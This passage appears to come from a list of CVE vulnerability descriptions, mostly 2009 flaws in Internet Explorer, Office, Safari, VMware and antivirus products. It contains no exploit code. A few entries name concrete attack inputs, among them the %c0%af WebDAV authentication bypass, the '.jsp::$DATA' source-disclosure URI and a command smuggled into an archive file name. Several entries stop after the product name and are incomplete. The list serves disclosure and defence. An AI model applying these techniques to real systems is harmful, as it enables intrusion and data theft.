bypass intended sharing restrictions, and read, create, or modify files, in certain circumstances involving user accounts that lack home directories. [CVE-2009-2804] Integer overflow in ColorSync in Apple Mac OS X 10.4.11 and 10.5.8, and Safari before 4.0.4 on Windows, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted ColorSync profile embedded in an image, leading to a heap-based buffer overflow. [CVE-2009-2794] The Exchange Support component in Apple iPhone OS before 3.1, and iPhone OS before 3.1.1 for iPod touch, does not properly implement the "Maximum inactivity time lock" functionality, which allows local users to bypass intended Microsoft Exchange restrictions by choosing a large Require Passcode time value. [CVE-2009-2761] Unquoted Windows search path vulnerability in the scheduler (sched.exe) in Avira AntiVir, AntiVir Premium, Premium Security Suite, and AntiVir Professional might allow local users to gain privileges via a malicious antivir.exe file in the "C:\Program Files\avira\" directory. [CVE-2009-2717] The Abstract Window Toolkit (AWT) implementation in Sun Java SE 6 before Update 15 on Windows 2000 Professional does not provide a Security Warning Icon, which makes it easier for context-dependent attackers to trick a user into interacting unsafely with an untrusted applet. [CVE-2009-2711] XScreenSaver in Sun Solaris 9 and 10, OpenSolaris before snv_120, and X11 6.4.1 for Solaris 8, when the Xorg or Xnewt server is used, allows physically proximate attackers to obtain sensitive information by reading popup windows, which are displayed even when the screen is locked, a different vulnerability than CVE-2009-1276. [CVE-2009-2688] Multiple integer overflows in glyphs-eimage.c in XEmacs 21.4.22, when running on Windows, allow remote attackers to cause a denial of service (crash) or execute arbitrary code via (1) the tiff_instantiate function processing a crafted TIFF file, (2) the png_instantiate function processing a crafted PNG file, and (3) the jpeg_instantiate function processing a crafted JPEG file, all which trigger a heap-based buffer overflow. NOTE: the provenance of this information is unknown [CVE-2009-2681] Unspecified vulnerability in HP ProCurve Identity Driven Manager (IDM) A.02.x through A.02.03 and A.03.x through A.03.00, on Windows Server 2003 with IAS and Windows Server 2008 with NPS, allows local users to gain privileges via unknown vectors. [CVE-2009-2668] Microsoft Internet Explorer 6 through 6.0.2900.2180 and 7 through 7.0.6000.16473 allows remote attackers to cause a denial of service (CPU consumption) via an XML document composed of a long series of start-tags with no corresponding end-tags, a related issue to CVE-2009-1232. [CVE-2009-2628] The VMnc media codec in vmnc.dll in VMware Movie Decoder before 6.5.3 build 185404, VMware Workstation 6.5.x before 6.5.3 build 185404, VMware Player 2.5.x before 2.5.3 build 185404, and VMware ACE 2.5.x before 2.5.3 build 185404 on Windows does not properly handle certain small heights in video content, which might allow remote attackers to execute arbitrary code via a crafted AVI file that triggers heap memory corruption. [CVE-2009-2576] Microsoft Internet Explorer 6.0.2900.2180 and earlier allows remote attackers to cause a denial of service (CPU and memory consumption) via a long Unicode string argument to the write method, a related issue to CVE-2009-2479. NOTE: it was later reported that 7.0.6000.16473 and earlier are also affected. [CVE-2009-2536] Microsoft Internet Explorer 5 through 8 allows remote attackers to cause a denial of service (memory consumption and application crash) via a large integer value for the length property of a Select object, a related issue to CVE-2009-1692. [CVE-2009-2531] Microsoft Internet Explorer 6, 6 SP1, 7, and 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability," a different vulnerability than CVE-2009-2530. [CVE-2009-2530] Microsoft Internet Explorer 6, 6 SP1, 7, and 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability," a different vulnerability than CVE-2009-2531. [CVE-2009-2529] Microsoft Internet Explorer 5.01 SP4, 6, 6 SP1, 7, and 8 does not properly handle argument validation for unspecified variables, which allows remote attackers to execute arbitrary code via a crafted HTML document, aka "HTML Component Handling Vulnerability." [CVE-2009-2528] GDI+ in Microsoft Office XP SP3 does not properly handle malformed objects in Office Art Property Tables, which allows remote attackers to execute arbitrary code via a crafted Office document that triggers memory corruption, aka "Memory Corruption Vulnerability." [CVE-2009-2521] Stack consumption vulnerability in the FTP Service in Microsoft Internet Information Services (IIS) 5.0 through 7.0 allows remote authenticated users to cause a denial of service (daemon crash) via a list (ls) -R command containing a wildcard that references a subdirectory, followed by a .. (dot dot), aka "IIS FTP Service DoS Vulnerability." [CVE-2009-2518] Integer overflow in GDI+ in Microsoft Office XP SP3 allows remote attackers to execute arbitrary code via an Office document with a bitmap (aka BMP) image that triggers memory corruption, aka "Office BMP Integer Overflow Vulnerability." [CVE-2009-2512] The Web Services on Devices API (WSDAPI) in Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 does not properly process the headers of WSD messages, which allows remote attackers to execute arbitrary code via a crafted (1) message or (2) response, aka "Web Services on Devices API Memory Corruption Vulnerability." [CVE-2009-2506] Integer overflow in the text converters in Microsoft Office Word 2002 SP3 and 2003 SP3 [CVE-2009-2497] The Common Language Runtime (CLR) in Microsoft .NET Framework 2.0, 2.0 SP1, 2.0 SP2, 3.5, and 3.5 SP1, and Silverlight 2, does not properly handle interfaces, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP), (2) a crafted Silverlight application, (3) a crafted ASP.NET application, or (4) a crafted .NET Framework application, aka "Microsoft Silverlight and Microsoft .NET Framework CLR Vulnerability." [CVE-2009-2496] Heap-based buffer overflow in the Office Web Components ActiveX Control in Microsoft Office XP SP3, Office 2003 SP3, Office XP Web Components SP3, Office 2003 Web Components SP3, Office 2003 Web Components SP1 for the 2007 Microsoft Office System, Internet Security and Acceleration (ISA) Server 2004 SP3 and 2006 SP1, and Office Small Business Accounting 2006 allows remote attackers to execute arbitrary code via unspecified parameters to unknown methods, aka "Office Web Components Heap Corruption Vulnerability." [CVE-2009-2495] The Active Template Library (ATL) in Microsoft Visual Studio .NET 2003 SP1, Visual Studio 2005 SP1 and 2008 Gold and SP1, and Visual C++ 2005 SP1 and 2008 Gold and SP1 does not properly enforce string termination, which allows remote attackers to obtain sensitive information via a crafted HTML document with an ATL (1) component or (2) control that triggers a buffer over-read, related to ATL headers and buffer allocation, aka "ATL Null String Vulnerability." [CVE-2009-2493] The Active Template Library (ATL) in Microsoft Visual Studio .NET 2003 SP1, Visual Studio 2005 SP1 and 2008 Gold and SP1, and Visual C++ 2005 SP1 and 2008 Gold and SP1 [CVE-2009-2479] Mozilla Firefox 3.0.x, 3.5, and 3.5.1 on Windows allows remote attackers to cause a denial of service (uncaught exception and application crash) via a long Unicode string argument to the write method. NOTE: this was originally reported as a stack-based buffer overflow. NOTE: on Linux and Mac OS X, a crash resulting from this long string reportedly occurs in an operating-system library, not in Firefox. [CVE-2009-2445] Oracle iPlanet Web Server (formerly Sun Java System Web Server or Sun ONE Web Server) 6.1 before SP12, and 7.0 through Update 6, when running on Windows, allows remote attackers to read arbitrary JSP files via an alternate data stream syntax, as demonstrated by a .jsp::$DATA URI. [CVE-2009-2433] Stack-based buffer overflow in the AddFavorite method in Microsoft Internet Explorer allows remote attackers to cause a denial of service (application crash) and possibly have unspecified other impact via a long URL in the first argument. [CVE-2009-2420] Apple Safari 3.2.3 does not properly implement the file: protocol handler, which allows remote attackers to read arbitrary files or cause a denial of service (launch of multiple Windows Explorer instances) via vectors involving an unspecified HTML tag, possibly a related issue to CVE-2009-1703. [CVE-2009-2411] Multiple integer overflows in the libsvn_delta library in Subversion before 1.5.7, and 1.6.x before 1.6.4, allow remote authenticated users and remote Subversion servers to execute arbitrary code via an svndiff stream with large windows that trigger a heap-based buffer overflow, a related issue to CVE-2009-2412. [CVE-2009-2350] Microsoft Internet Explorer 6.0.2900.2180 and earlier does not block javascript: URIs in Refresh headers in HTTP responses, which allows remote attackers to conduct cross-site scripting (XSS) attacks via vectors related to (1) injecting a Refresh header or (2) specifying the content of a Refresh header, a related issue to CVE-2009-1312. [CVE-2009-2261] PeaZIP 2.6.1, 2.5.1, and earlier on Windows allows user-assisted remote attackers to execute arbitrary commands via a .zip archive with a .txt file whose name contains \| (pipe) characters and a command. [CVE-2009-2069] Microsoft Internet Explorer before 8 displays a cached certificate for a (1) 4xx or (2) 5xx CONNECT response page returned by a proxy server, which allows man-in-the-middle attackers to spoof an arbitrary https site by letting a browser obtain a valid certificate from this site during one request, and then sending the browser a crafted 502 response page upon a subsequent request. [CVE-2009-2064] Microsoft Internet Explorer 8, and possibly other versions, detects http content in https web pages only when the top-level frame uses https, which allows man-in-the-middle attackers to execute arbitrary web script, in an https site's context, by modifying an http page to include an https iframe that references a script file on an http site, related to "HTTP-Intended-but-HTTPS-Loadable (HPIHSL) pages." [CVE-2009-2057] Microsoft Internet Explorer before 8 uses the HTTP Host header to determine the context of a document provided in a (1) 4xx or (2) 5xx CONNECT response from a proxy server, which allows man-in-the-middle attackers to execute arbitrary web script by modifying this CONNECT response, aka an "SSL tampering" attack. [CVE-2009-2027] The Installer in Apple Safari before 4.0 on Windows allows local users to gain privileges by checking a box that specifies an immediate launch of the application after installation, related to an unspecified compression method. [CVE-2009-1919] Microsoft Internet Explorer 5.01 SP4 and 6 SP1 [CVE-2009-1918] Microsoft Internet Explorer 5.01 SP4 and 6 SP1 [CVE-2009-1917] Microsoft Internet Explorer 6 SP1 [CVE-2009-1805] Unspecified vulnerability in the VMware Descheduled Time Accounting driver in VMware Workstation 6.5.1 and earlier, VMware Player 2.5.1 and earlier, VMware ACE 2.5.1 and earlier, VMware Server 1.x before 1.0.9 build 156507 and 2.x before 2.0.1 build 156745, VMware Fusion 2.x before 2.0.2 build 147997, VMware ESXi 3.5, and VMware ESX 3.0.2, 3.0.3, and 3.5, when the Descheduled Time Accounting Service is not running, allows guest OS users on Windows to cause a denial of service via unknown vectors. [CVE-2009-1783] Multiple FRISK Software F-Prot anti-virus products, including Antivirus for Exchange, Linux on IBM zSeries, Linux x86 File Servers, Linux x86 Mail Servers, Linux x86 Workstations, Solaris Mail Servers, Antivirus for Windows, and others, allow remote attackers to bypass malware detection via a crafted CAB archive. [CVE-2009-1782] Multiple F-Secure anti-virus products, including Anti-Virus for Microsoft Exchange 7.10 and earlier [CVE-2009-1761] The message engine in CA ARCserve Backup r12.0 and r12.0 SP1 for Windows allows remote attackers to cause a denial of service (crash) via (1) an invalid 0x13 message, which is not properly handled in the ASCORE module, or (2) a 0x3B message with invalid stub data that triggers an RPC marshalling error. [CVE-2009-1716] CFNetwork in Apple Safari before 4.0 on Windows does not properly protect the temporary files created for downloads, which allows local users to obtain sensitive information by reading these files. [CVE-2009-1707] Race condition in the Reset Safari implementation in Apple Safari before 4.0 on Windows might allow local users to read stored web-site passwords via unspecified vectors. [CVE-2009-1706] The Private Browsing feature in Apple Safari before 4.0 on Windows does not remove cookies from the alternate cookie store in unspecified circumstances upon (1) disabling of the feature or (2) exit of the application, which makes it easier for remote web servers to track users via a cookie. [CVE-2009-1705] CoreGraphics in Apple Safari before 4.0 on Windows does not properly use arithmetic during automatic hinting of TrueType fonts, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via crafted font data. [CVE-2009-1628] Stack-based buffer overflow in mnet.exe in Unisys Business Information Server (BIS) 10 and 10.1 on Windows allows remote attackers to execute arbitrary code via a crafted TCP packet. [CVE-2009-1565] vmnc.dll in the VMnc media codec in VMware Movie Decoder before 6.5.4 Build 246459 on Windows, and the movie decoder in VMware Workstation 6.5.x before 6.5.4 build 246459, VMware Player 2.5.x before 2.5.4 build 246459, and VMware Server 2.x on Windows, allows remote attackers to execute arbitrary code via an AVI file with crafted HexTile-encoded video chunks that trigger heap-based buffer overflows, related to "integer truncation errors." [CVE-2009-1564] Heap-based buffer overflow in vmnc.dll in the VMnc media codec in VMware Movie Decoder before 6.5.4 Build 246459 on Windows, and the movie decoder in VMware Workstation 6.5.x before 6.5.4 build 246459, VMware Player 2.5.x before 2.5.4 build 246459, and VMware Server 2.x on Windows, allows remote attackers to execute arbitrary code via an AVI file with crafted video chunks that use HexTile encoding. [CVE-2009-1547] Unspecified vulnerability in Microsoft Internet Explorer 5.01 SP4, 6, 6 SP1, and 7 allows remote attackers to execute arbitrary code via a crafted data stream header that triggers memory corruption, aka "Data Stream Header Corruption Vulnerability." [CVE-2009-1542] The Virtual Machine Monitor (VMM) in Microsoft Virtual PC 2004 SP1, 2007, and 2007 SP1, and Microsoft Virtual Server 2005 R2 SP1, does not enforce CPU privilege-level requirements for all machine instructions, which allows guest OS users to execute arbitrary kernel-mode code and gain privileges within the guest OS via a crafted application, aka "Virtual PC and Virtual Server Privileged Instruction Decoding Vulnerability." [CVE-2009-1536] ASP.NET in Microsoft .NET Framework 2.0 SP1 and SP2 and 3.5 Gold and SP1, when ASP 2.0 is used in integrated mode on IIS 7.0, does not properly manage request scheduling, which allows remote attackers to cause a denial of service (daemon outage) via a series of crafted HTTP requests, aka "Remote Unauthenticated Denial of Service in ASP.NET Vulnerability." [CVE-2009-1535] The WebDAV extension in Microsoft Internet Information Services (IIS) 5.1 and 6.0 allows remote attackers to bypass URI-based protection mechanisms, and list folders or read, create, or modify files, via a %c0%af (Unicode / character) at an arbitrary position in the URI, as demonstrated by inserting %c0%af into a "/protected/" initial pathname component to bypass the password protection on the protected\ folder, aka "IIS 5.1 and 6.0 WebDAV Authentication Bypass Vulnerability," a different vulnerability than CVE-2009-1122. [CVE-2009-1534] Buffer overflow in the Office Web Components ActiveX Control in Microsoft Office XP SP3, Office 2000 Web Components SP3, Office XP Web Components SP3, BizTalk Server 2002, and Visual Studio .NET 2003 SP1 allows remote attackers to execute arbitrary code via crafted property values, aka "Office Web Components Buffer Overflow Vulnerability." [CVE-2009-1522] The IBM Tivoli Storage Manager (TSM) client 5.5.0.0 through 5.5.1.17 on AIX and Windows, when SSL is used, allows remote attackers to conduct unspecified man-in-the-middle attacks and read arbitrary files via unknown vectors. [CVE-2009-1491] McAfee GroupShield for Microsoft Exchange on Exchange Server 2000, and possibly other anti-virus or anti-spam products from McAfee or other vendors, does not scan X- headers for malicious content, which allows remote attackers to bypass virus detection via a crafted message, as demonstrated by a message with an X-Testing header and no message body. [CVE-2009-1473] The (1) Windows and (2) Java client programs for the ATEN KH1516i IP KVM switch with firmware 1.0.063 and the KN9116 IP KVM switch with firmware 1.1.104 do not properly use RSA cryptography for a symmetric session-key negotiation, which makes it easier for remote attackers to (a) decrypt network traffic, or (b) conduct man-in-the-middle attacks, by repeating unspecified "client-side calculations." [CVE-2009-1419] Unspecified vulnerability in HP Discovery & Dependency Mapping Inventory (DDMI) 2.0.0 through 2.52, 7.50, and 7.51 on Windows allows remote attackers to access DDMI agents via unknown vectors. [CVE-2009-1394] Stack-based buffer overflow in Motorola Timbuktu Pro 8.6.5 on Windows allows remote attackers to execute arbitrary code by sending a long malformed string over the PlughNTCommand named pipe. [CVE-2009-1348] The AV engine before DAT 5600 in McAfee VirusScan, Total Protection, Internet Security, SecurityShield for Microsoft ISA Server, Security for Microsoft Sharepoint, Security for Email Servers, Email Gateway, and Active Virus Defense allows remote attackers to bypass virus detection via (1) an invalid Headflags field in a malformed RAR archive, (2) an invalid Packsize field in a malformed RAR archive, or (3) an invalid Filelength field in a malformed ZIP archive. [CVE-2009-1276] XScreenSaver in Sun Solaris 10 and OpenSolaris before snv_109, and Solaris 8 and 9 with GNOME 2.0 or 2.0.2, allows physically proximate attackers to obtain sensitive information by reading popup windows, which are displayed even when the screen is locked, as demonstrated by Thunderbird new-mail notifications. [CVE-2009-1267] Unspecified vulnerability in the LDAP dissector in Wireshark 0.99.2 through 1.0.6, when running on Windows, allows remote attackers to cause a denial of service (crash) via unknown attack vectors. [CVE-2009-1233] Apple Safari 3.2.2 and 4 Beta on Windows allows remote attackers to cause a denial of service (application crash) via an XML document containing many nested A elements. [CVE-2009-1161] Directory traversal vulnerability in the TFTP service in Cisco CiscoWorks Common Services (CWCS) 3.0.x through 3.2.x on Windows, as used in Cisco Unified Service Monitor, Security Manager, TelePresence Readiness Assessment Manager, Unified Operations Manager, Unified Provisioning Manager, and other products, allows remote attackers to access arbitrary files via unspecified vectors. [CVE-2009-1140] Microsoft Internet Explorer 5.01 SP4 [CVE-2009-1137] Microsoft Office PowerPoint 2000 SP3, 2002 SP3, and 2003 SP3 allows remote attackers to execute arbitrary code via crafted sound data in a file that uses a PowerPoint 4.0 native file format, leading to memory corruption, aka "Legacy File Format Vulnerability," a different vulnerability than CVE-2009-0222, CVE-2009-0223, CVE-2009-0226, and CVE-2009-0227. [CVE-2009-1136] The Microsoft Office Web Components Spreadsheet ActiveX control (aka OWC10 or OWC11), as distributed in Office XP SP3 and Office 2003 SP3, Office XP Web Components SP3, Office 2003 Web Components SP3, Office 2003 Web Components SP1 for the 2007 Microsoft Office System, Internet Security and Acceleration (ISA) Server 2004 SP3 and 2006 Gold and SP1, and Office Small Business Accounting 2006, when used in Internet Explorer, allows remote attackers to execute arbitrary code via a crafted call to the msDataSourceObject method, as exploited in the wild in July and August 2009, aka "Office Web Components HTML Script Vulnerability." [CVE-2009-1135] Microsoft Internet Security and Acceleration (ISA) Server 2006 Gold and SP1, when Radius OTP is enabled, uses the HTTP-Basic authentication method, which allows remote attackers to gain the privileges of an arbitrary account, and access published web pages, via vectors involving attempted access to a network resource behind the ISA Server, aka "Radius OTP Bypass Vulnerability." [CVE-2009-1134] Excel in 2007 Microsoft Office System SP1 and SP2 [CVE-2009-1131] Multiple stack-based buffer overflows in Microsoft Office PowerPoint 2000 SP3 allow remote attackers to execute arbitrary code via a large amount of data associated with unspecified atoms in a PowerPoint file that triggers memory corruption, aka "Data Out of Bounds Vulnerability." [CVE-2009-1130] Heap-based buffer overflow in Microsoft Office PowerPoint 2002 SP3 and 2003 SP3, and PowerPoint in Microsoft Office 2004 for Mac, allows remote attackers to execute arbitrary code via a crafted structure in a Notes container in a PowerPoint file that causes PowerPoint to read more data than was allocated when creating a C++ object, leading to an overwrite of a function pointer, aka "Heap Corruption Vulnerability." [CVE-2009-1129] Multiple stack-based buffer overflows in the PowerPoint 95 importer (PP7X32.DLL) in Microsoft Office PowerPoint 2000 SP3, 2002 SP3, and 2003 SP3 allow remote attackers to execute arbitrary code via an inconsistent record length in sound data in a file that uses a PowerPoint 95 (PPT95) native file format, aka "PP7 Memory Corruption Vulnerability," a different vulnerability than CVE-2009-1128. [CVE-2009-1128] Microsoft Office PowerPoint 2000 SP3, 2002 SP3, and 2003 SP3 allows remote attackers to execute arbitrary code via crafted sound data in a file that uses a PowerPoint 95 native file format, leading to memory corruption, aka "PP7 Memory Corruption Vulnerability," a different vulnerability than CVE-2009-1129. [CVE-2009-1044] Mozilla Firefox 3.0.7 on Windows 7 allows remote attackers to execute arbitrary code via unknown vectors related to the _moveToEdgeShift XUL tree method, which triggers garbage collection on objects that are still in use, as demonstrated by Nils during a PWN2OWN competition at CanSecWest 2009. [CVE-2009-1011] Unspecified vulnerability in the Outside In Technology component in Oracle Application Server 8.2.2 and 8.3.0 allows local users to affect confidentiality, integrity, and availability, related to HTML. NOTE: the previous information was obtained from the April 2009 CPU. Oracle has not commented on reliable researcher claims that this issue is for multiple integer overflows in a function that parses an optional data stream within a Microsoft Office file, leading to a heap-based buffer overflow. [CVE-2009-0954] Heap-based buffer overflow in Apple QuickTime before 7.6.2 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a movie file containing crafted Clipping Region (CRGN) atom types. [CVE-2009-0944] The Microsoft Office Spotlight Importer in Spotlight in Apple Mac OS X 10.4.11 and 10.5 before 10.5.7 does not properly validate Microsoft Office files, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a file that triggers memory corruption. [CVE-2009-0901] The Active Template Library (ATL) in Microsoft Visual Studio .NET 2003 SP1, Visual Studio 2005 SP1 and 2008 Gold, and Visual C++ 2005 SP1 and 2008 Gold and SP1 [CVE-2009-0894] Heap-based buffer overflow in the decoder_create function in the initialization functionality in xvidcore/src/decoder.c in Xvid before 1.2.2, as used by Windows Media Player and other applications, allows remote attackers to execute arbitrary code via vectors involving the DirectShow (aka DShow) frontend and improper handling of the XVID_ERR_MEMORY return code during processing of a crafted movie file. NOTE: some of these details are obtained from third party information. [CVE-2009-0893] Multiple heap-based buffer overflows in xvidcore/src/decoder.c in the xvidcore library in Xvid before 1.2.2, as used by Windows Media Player and other applications, allow remote attackers to execute arbitrary code by providing a crafted macroblock (aka MBlock) number in a video stream in a crafted movie file that triggers heap memory corruption, related to a "missing resync marker range check" and the (1) decoder_iframe, (2) decoder_pframe, and (3) decoder_bframe functions. [CVE-2009-0880] Directory traversal vulnerability in the CIM server in IBM Director before 5.20.3 Service Update 2 on Windows allows remote attackers to load and execute arbitrary local DLL code via a .. (dot dot) in a /CIMListener/ URI in an M-POST request. [CVE-2009-0879] The CIM server in IBM Director before 5.20.3 Service Update 2 on Windows allows remote attackers to cause a denial of service (daemon crash) via a long consumer name, as demonstrated by an M-POST request to a long /CIMListener/ URI. [CVE-2009-0869] Buffer overflow in the client in IBM Tivoli Storage Manager (TSM) HSM 5.3.2.0 through 5.3.5.0, 5.4.0.0 through 5.4.2.5, and 5.5.0.0 through 5.5.1.4 on Windows allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via unspecified vectors. [CVE-2009-0841] Directory traversal vulnerability in mapserv.c in mapserv in MapServer 4.x before 4.10.4 and 5.x before 5.2.2, when running on Windows with Cygwin, allows remote attackers to create arbitrary files via a .. (dot dot) in the id parameter. [CVE-2009-0671] REJECT Format string vulnerability in the University of Washington (UW) c-client library, as used by the UW IMAP toolkit imap-2007d and other applications, allows remote attackers to execute arbitrary code via format string specifiers in the initial request to the IMAP port (143/tcp). NOTE: Red Hat has disputed the vulnerability, stating "The Red Hat Security Response Team have been unable to confirm the existence of this format string vulnerability in the toolkit, and the sample published exploit is not complete or functional." CVE agrees that the exploit contains syntax errors and uses Unix-only include files while invoking Windows functions. [CVE-2009-0655] Lenovo Veriface III allows physically proximate attackers to login to a Windows account by presenting a "plain image" of the authorized user. [CVE-2009-0647] msnmsgr.exe in Windows Live Messenger (WLM) 2009 build 14.0.8064.206, and other 14.0.8064.x builds, allows remote attackers to cause a denial of service (application crash) via a modified header in a packet, as possibly demonstrated by a UTF-8.0 value of the charset field in the Content-Type header line. NOTE: this has been reported as a format string vulnerability by some sources, but the provenance of that information is unknown. [CVE-2009-0612] Trend Micro InterScan Web Security Virtual Appliance (IWSVA) 3.x and InterScan Web Security Suite (IWSS) 3.x, when basic authorization is enabled on the standalone proxy, forwards the Proxy-Authorization header from Windows Media Player, which allows remote web servers to obtain credentials by offering a media stream and then capturing this header. [CVE-2009-0601] Format string vulnerability in Wireshark 0.99.8 through 1.0.5 on non-Windows platforms allows local users to cause a denial of service (application crash) via format string specifiers in the HOME environment variable. [CVE-2009-0566] Microsoft Office Publisher 2007 SP1 does not properly calculate object handler data for Publisher files, which allows remote attackers to execute arbitrary code via a crafted file in a legacy format that triggers memory corruption, aka "Pointer Dereference Vulnerability." [CVE-2009-0565] Buffer overflow in Microsoft Office Word 2000 SP3, 2002 SP3, and 2007 SP1 and SP2 [CVE-2009-0563] Stack-based buffer overflow in Microsoft Office Word 2002 SP3, 2003 SP3, and 2007 SP1 and SP2 [CVE-2009-0562] The Office Web Components ActiveX Control in Microsoft Office XP SP3, Office 2003 SP3, Office XP Web Components SP3, Office 2003 Web Components SP3, Office 2003 Web Components SP1 for the 2007 Microsoft Office System, Internet Security and Acceleration (ISA) Server 2004 SP3 and 2006 SP1, and Office Small Business Accounting 2006 does not properly allocate memory, which allows remote attackers to execute arbitrary code via unspecified vectors that trigger "system state" corruption, aka "Office Web Components Memory Allocation Vulnerability." [CVE-2009-0561] Integer overflow in Excel in Microsoft Office 2000 SP3, Office XP SP3, Office 2003 SP3, and Office 2004 and 2008 for Mac [CVE-2009-0560] Excel in Microsoft Office 2000 SP3, Office XP SP3, Office 2003 SP3, and Office 2004 and 2008 for Mac [CVE-2009-0559] Stack-based buffer overflow in Excel in Microsoft Office 2000 SP3 and Office XP SP3 allows remote attackers to execute arbitrary code via a crafted Excel file with a malformed record object, aka "String Copy Stack-Based Overrun Vulnerability." [CVE-2009-0558] Array index error in Excel in Microsoft Office 2000 SP3 and Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac, allows remote attackers to execute arbitrary code via a crafted Excel file with a malformed record object, aka "Array Indexing Memory Corruption Vulnerability." [CVE-2009-0557] Excel in Microsoft Office 2000 SP3, Office XP SP3, Office 2003 SP3, and Office 2004 and 2008 for Mac [CVE-2009-0556] Microsoft Office PowerPoint 2000 SP3, 2002 SP3, and 2003 SP3, and PowerPoint in Microsoft Office 2004 for Mac, allows remote attackers to execute arbitrary code via a PowerPoint file with an OutlineTextRefAtom containing an an invalid index value that triggers memory corruption, as exploited in the wild in April 2009 by Exploit:Win32/Apptom.gen, aka "Memory Corruption Vulnerability." [CVE-2009-0549] Excel in Microsoft Office 2000 SP3, Office XP SP3, Office 2003 SP3, and Office 2004 and 2008 for Mac [CVE-2009-0537] Integer overflow in the fts_build function in fts.c in libc in (1) OpenBSD 4.4 and earlier and (2) Microsoft Interix 6.0 build 10.0.6030.0 allows context-dependent attackers to cause a denial of service (application crash) via a deep directory tree, related to the fts_level structure member, as demonstrated by (a) du, (b) rm, (c) chmod, and (d) chgrp on OpenBSD [CVE-2009-0522] Adobe Flash Player 9.x before 9.0.159.0 and 10.x before 10.0.22.87 on Windows allows remote attackers to trick a user into visiting an arbitrary URL via an unspecified manipulation of the "mouse pointer display," related to a "Clickjacking attack." [CVE-2009-0438] IBM WebSphere Application Server (WAS) 7 before 7.0.0.1 on Windows allows remote attackers to bypass "Authorization checking" and obtain sensitive information from JSP pages via a crafted request. NOTE: this is probably a duplicate of CVE-2008-5412. [CVE-2009-0437] The Installation Factory installation process for IBM WebSphere Application Server (WAS) 6.0.2 on Windows, when WAS is registered as a Windows service, allows local users to obtain sensitive information by reading the logs/instconfigifwas6.log log file. [CVE-2009-0419] Microsoft XML Core Services, as used in Microsoft Expression Web, Office, Internet Explorer 6 and 7, and other products, does not properly restrict access from web pages to Set-Cookie2 HTTP response headers, which allows remote attackers to obtain sensitive information from cookies via XMLHttpRequest calls, related to the HTTPOnly protection mechanism. NOTE: this issue reportedly exists because of an incomplete fix for CVE-2008-4033. [CVE-2009-0389] Multiple insecure method vulnerabilities in the Web On Windows (WOW) ActiveX control in WOW ActiveX 2 allow remote attackers to (1) create and overwrite arbitrary files via the WriteIniFileString method, (2) execute arbitrary programs via the ShellExecute method, (3) read from the registry via unspecified vectors, and (4) write to the registry via unspecified vectors. NOTE: vectors 1 and 2 can be used together to execute arbitrary code. [CVE-2009-0376] Heap-based buffer overflow in a DLL file in RealNetworks RealPlayer 10, RealPlayer 10.5 6.0.12.1040 through 6.0.12.1741, RealPlayer 11 11.0.0 through 11.0.4, RealPlayer Enterprise, Mac RealPlayer 10 and 10.1, Linux RealPlayer 10, and Helix Player 10.x allows remote attackers to execute arbitrary code via a crafted Internet Video Recording (IVR) file with a modified field that controls an unspecified structure length and triggers heap corruption, related to use of RealPlayer through a Windows Explorer plugin. [CVE-2009-0375] Buffer overflow in a DLL file in RealNetworks RealPlayer 10, RealPlayer 10.5 6.0.12.1040 through 6.0.12.1741, RealPlayer 11 11.0.0 through 11.0.4, RealPlayer Enterprise, Mac RealPlayer 10 and 10.1, Linux RealPlayer 10, and Helix Player 10.x allows remote attackers to execute arbitrary code via a crafted Internet Video Recording (IVR) file with a filename length field containing a large integer, which triggers overwrite of an arbitrary memory location with a 0x00 byte value, related to use of RealPlayer through a Windows Explorer plugin. [CVE-2009-0369] Microsoft Internet Explorer 7 allows remote attackers to trick a user into visiting an arbitrary URL via an onclick action that moves a crafted element to the current mouse position, related to a "Clickjacking" vulnerability. [CVE-2009-0321] Apple Safari 3.2.1 (aka AppVer 3.525.27.1) on Windows allows remote attackers to cause a denial of service (infinite loop or access violation) via a link to an http URI in which the authority (aka hostname) portion is either a (1) . (dot) or (2) .. (dot dot) sequence. [CVE-2009-0282] Integer overflow in Ralink Technology USB wireless adapter (RT73) 3.08 for Windows, and other wireless card drivers including rt2400, rt2500, rt2570, and rt61, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a Probe Request packet with a long SSID, possibly related to an integer signedness error. [CVE-2009-0238] Microsoft Office Excel 2000 SP3, 2002 SP3, 2003 SP3, and 2007 SP1 [CVE-2009-0237] Cross-site scripting (XSS) vulnerability in cookieauth.dll in the HTML forms authentication component in Microsoft Forefront Threat Management Gateway, Medium Business Edition (TMG MBE) [CVE-2009-0227] Stack-based buffer overflow in the PowerPoint 4.2 conversion filter (PP4X32.DLL) in Microsoft Office PowerPoint 2000 SP3, 2002 SP3, and 2003 SP3 allows remote attackers to execute arbitrary code via a large number of structures in sound data in a file that uses a PowerPoint 4.0 native file format, leading to memory corruption, aka "Legacy File Format Vulnerability," a different vulnerability than CVE-2009-0222, CVE-2009-0223, CVE-2009-0226, and CVE-2009-1137. [CVE-2009-0226] Stack-based buffer overflow in the PowerPoint 4.2 conversion filter in Microsoft Office PowerPoint 2000 SP3, 2002 SP3, and 2003 SP3 allows remote attackers to execute arbitrary code via a long string in sound data in a file that uses a PowerPoint 4.0 native file format, leading to memory corruption, aka "Legacy File Format Vulnerability," a different vulnerability than CVE-2009-0222, CVE-2009-0223, CVE-2009-0227, and CVE-2009-1137. [CVE-2009-0225] Microsoft Office PowerPoint 2002 SP3 allows remote attackers to execute arbitrary code via crafted sound data in a file that uses a PowerPoint 95 native file format, leading to improper "array indexing" and memory corruption, aka "PP7 Memory Corruption Vulnerability." [CVE-2009-0224] Microsoft Office PowerPoint 2000 SP3, 2002 SP3, 2003 SP3, and 2007 SP1 and SP2 [CVE-2009-0223] Microsoft Office PowerPoint 2000 SP3, 2002 SP3, and 2003 SP3 allows remote attackers to execute arbitrary code via crafted sound data in a file that uses a PowerPoint 4.0 native file format, leading to memory 